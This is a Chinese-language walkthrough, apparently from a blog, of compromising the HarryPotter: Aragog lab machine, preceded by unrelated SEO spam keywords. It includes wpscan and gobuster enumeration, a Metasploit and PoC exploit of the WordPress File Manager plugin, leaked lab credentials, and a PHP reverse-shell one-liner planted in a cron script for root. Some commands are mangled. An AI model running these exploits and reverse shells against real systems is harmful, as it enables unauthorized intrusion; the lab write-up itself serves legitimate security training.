嘉祥网站建设哪家便宜,公众号开发难吗,wordpress媒体库自定义,网站做产品的审核吗文章目录 方式一信息收集主机发现端口扫描目录扫描wpscan工具 漏洞利用msf工具数据库权限用户权限root提权 方式二信息收集gobuster扫描wpscan扫描 漏洞利用POC 靶机文档#xff1a;HarryPotter: Aragog (1.0.2) 下载地址#xff1a;Download (Mirror) 方式一
信息收集
主机… 文章目录 方式一信息收集主机发现端口扫描目录扫描wpscan工具 漏洞利用msf工具数据库权限用户权限root提权 方式二信息收集gobuster扫描wpscan扫描 漏洞利用POC 靶机文档HarryPotter: Aragog (1.0.2) 下载地址Download (Mirror) 方式一
信息收集
主机发现 sudo arp-scan -l端口扫描 目录扫描 看到这里扫出来目录中index.htmljavascript, server-status,blog下的部分目录并且出现了wp-login.php这也说明了这是一个wordpress的cms框架
index.html blog
网页没有样式 查看网页源码 做域名ip映射 /etc/hosts
域名wordpress.aragog.hogwarts IP自己要访问靶机的机器的IP地址 发现是 WordPress 系统用 wpscan 扫一下加上 api-token 扫
wpscan工具 WPScan是一个扫描WordPress漏洞的扫描器可以扫描出wordpress的版本主题插件后台用户以及爆破后台用户密码等 wpscan --api-tokenblsnsog49N5d0UwAIYACcXs3fKbchB7JpbCgNutJRHA --url http://192.168.80.143/blog -e p --plugins-detection aggressive可以 发现该站点的插件中有很多漏洞而且都是关于file Manager的
漏洞利用
msf工具
msf6 search wordpress file manageruse 1
info查看需要配置的信息 需要配置rhost目标主机targeturl目标网址这个目标网址会自动跟前面的目标主机拼接所以我们直接把rhost设置为靶机的iptargeturl设置成/blog即可这里因为使用的是反向所以还需要配置自己的主机ip 在hagrid98家目录下得到一串base64格式加密的数据 使用BurpSuite的Decoder功能解码 数据库权限
找一下数据库的用户名密码查看数据库中有没有可利用信息
在**/etc/wordpress里可以打开config-default.php**。这里记录了MySQL的用户名密码可以用于登录数据库 登录数据库之前得首先得获取一个tty shell不然我们在数据库中的命令就看不到回显可以理解为将非交互式shell变成了交互式shell输入下面命令即可拿到tty shell 使用得到用户名root密码mySecr3tPass来连接数据库 wordpress数据库保存的用户名和密码一般都放在wp_users表里面的 在线解密网站 用户名hagrid98密码password123
用户权限
尝试SSH远程连接 root提权
使用sudo 和suid查询后发现没有可利用的 然后查找备份文件查看有没有.sh结尾的文件
find / -name *.sh推测应该被写入了计划任务这里我们建立一个反弹shell的脚本并通过它这个计划任务来执行 在tmp文件下创建反弹shell的php脚本并命名为a.php脚本代码如下 ?php $sockfsockopen(192.168.80.141 ,6868);exec(/bin/sh -i 3 3 23); ?/usr/bin/php是php的执行文件的目录这样才能执行php文件
其实也可以直接在.backup.sh里面直接写一个反弹shell kali监听6868端口 拿到root后可以使用crontab -l查看当前用户的计划任务列表 方式二
信息收集
gobuster扫描
└─$ gobuster dir -u http://192.168.80.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,htmlwpscan扫描
wpscan --api-tokenxxxxxxxxxxxxxxxxxxxxxxxxxxxx --url http://192.168.80.143/blog -e p --plugins-detection aggressive漏洞利用
POC
访问https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9 wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py到本地
查看脚本的使用方法 生成反弹 shell写入到payload.php文件里
php -r $sockfsockopen(192.168.80.141,6868);exec(/bin/sh -i 3 3 23);运行脚本得到反弹shell地址 地址中多写了一个/blog删除即可 等一会就反弹到了
